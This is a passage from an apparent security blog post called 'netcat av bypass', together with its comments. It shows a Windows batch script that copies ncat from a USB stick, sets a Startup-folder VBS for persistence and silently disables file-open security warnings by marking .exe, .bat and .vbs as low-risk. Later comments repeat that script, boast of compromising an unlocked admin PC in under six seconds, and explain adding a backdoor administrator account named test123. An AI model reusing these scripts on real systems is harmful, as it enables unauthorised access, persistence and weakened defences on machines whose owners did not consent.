%windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f
ECHO.
GOTO MENU

:winxp
@echo off
echo d | xcopy "C:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "E:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "F:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "G:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "H:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "I:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"
echo d | xcopy "J:\Documents and Settings\11\Desktop\Exploit2\ncat" "C:\ncat"

copy "C:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "E:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "F:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "G:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "H:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "I:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"
copy "J:\Documents and Settings\11\Desktop\Exploit2\ncat\VBS.vbs" "C:\Documents and Settings\default\Start Menu\Programs\Startup\VBS.vbs"

REM The path must be quoted because of the spaces in "Documents and Settings"
regedit /s "C:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "E:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "F:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "G:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "H:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "I:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
regedit /s "J:\Documents and Settings\11\Desktop\Exploit2\ncat\Disable_Open-File_Security_Warning.reg"
ECHO.
GOTO MENU

:warnings
@ECHO OFF
If exist "%Temp%\~import.reg" (
Attrib -R -S -H "%Temp%\~import.reg"
del /F /Q "%Temp%\~import.reg"
If exist "%Temp%\~import.reg" (
Echo Could not delete file "%Temp%\~import.reg"
Pause
)
)
> "%Temp%\~import.reg" ECHO Windows Registry Editor Version 5.00
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
>> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=dword:00000001
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
>> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
>> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=-
>> "%Temp%\~import.reg" ECHO.
>> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
>> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=-
START /WAIT REGEDIT /S "%Temp%\~import.reg"
DEL "%Temp%\~import.reg"
ECHO.
GOTO MENU

:reboot
shutdown -r -t 0


9 thoughts on "control – netcat av bypass"

  1. Hi Thanassis

    Note all of the above code is only the start of a project that could take months to complete. We will update each finding as we go along. As an example, we're coming to the conclusion that it's not worth disabling UAC.

    You don't need to turn off UAC to run netcat. I turn it off because it warns me that I'm trying to install something. It does not stop you from doing this, and once installed it no longer warns you!

    If you want to delete it anyway, the below will work. For more info find :uac in the scripts above. This includes the reg and the file to try and elevate your rights.

    ##### Don’t copy this line ###########

    C:\Windows\System32\cmd.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 1 /f

    ##### Don’t copy this line ###########

    More important warnings to stop are the ones that pop up each time netcat runs. Not UAC warnings. These can be deleted by running below.

    @ECHO OFF
    If exist "%Temp%\~import.reg" (
    Attrib -R -S -H "%Temp%\~import.reg"
    del /F /Q "%Temp%\~import.reg"
    If exist "%Temp%\~import.reg" (
    Echo Could not delete file "%Temp%\~import.reg"
    Pause
    )
    )
    > "%Temp%\~import.reg" ECHO Windows Registry Editor Version 5.00
    >> "%Temp%\~import.reg" ECHO.
    >> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Attachments]
    >> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=dword:00000001
    >> "%Temp%\~import.reg" ECHO.
    >> "%Temp%\~import.reg" ECHO [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Associations]
    >> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=".avi;.bat;.com;.cmd;.exe;.htm;.html;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;"
    >> "%Temp%\~import.reg" ECHO.
    >> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Attachments]
    >> "%Temp%\~import.reg" ECHO "SaveZoneInformation"=-
    >> "%Temp%\~import.reg" ECHO.
    >> "%Temp%\~import.reg" ECHO [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Associations]
    >> "%Temp%\~import.reg" ECHO "LowRiskFileTypes"=-
    START /WAIT REGEDIT /S "%Temp%\~import.reg"
    DEL "%Temp%\~import.reg"

  2. Also, these early scripts only work if you find an unlocked admin session. Now I understand this sounds unlikely, but as an example: any IT department will run as administrator, and most home users do too.

  3. What I understand is that most of what you are describing will work only if you execute through cmd which you have already opened as administrator. This means that you already faced the UAC message.
    If you do not "run as administrator" cmd then all following commands will fail due to missing privileges.
    Maybe I am missing something here.

  4. Hi Thanassis, you're not missing anything at all. Yep, we're hitting the lab boxes with open admin privs. We're finding UAC only informs you, it does not restrict you.

    This is a concept idea: what can you do in seconds if you find an unlocked PC? Well, if you have seconds and an unlocked PC, with this script you can fully compromise it.

    I know what you're thinking: what's the chance of finding an unlocked PC with full admin rights? Well, high in any IT environment. We get asked to pentest a lot of companies, some of which are IT places that offer their support teams full admin rights!

    The main point is having another tool prepared that may be of use at the right time is a positive thing.

    If you're looking for a remote exploit that will elevate your rights, sorry, this is not it. Look to Metasploit.

  5. Just to note: yes, this script runs through cmd, but as it's a batch file it will run this for you within seconds. We timed it, and from plugging the USB stick in to full compromise took under 6 seconds.

  6. Hi Thanassis, noticed a good site with regards to gaining admin from a guest account.

    http://vishnuvalentino.com/tips-and-trick/privilege-escalation-from-guest-to-administrator-windows7-windows2008/

    You need to edit it: right click, Edit, and search for ADD. Change the

    a.WriteLine ("net localgroup administrators /add v4l.wsf")

    to

    a.WriteLine ("net localgroup administrators /add test123")

    Then save and run using

    C:\Users\user\Desktop\Exploit3\ncat\cscript v41.wsf

    Or, if you're getting into the script idea:

    :Elevate
    cd C:\Users\user\Desktop\Exploit3\ncat\
    cscript v4l.wsf
    ECHO.
    GOTO MENU

    Log out and find the newly created admin account.

    username = test123
    password = test123
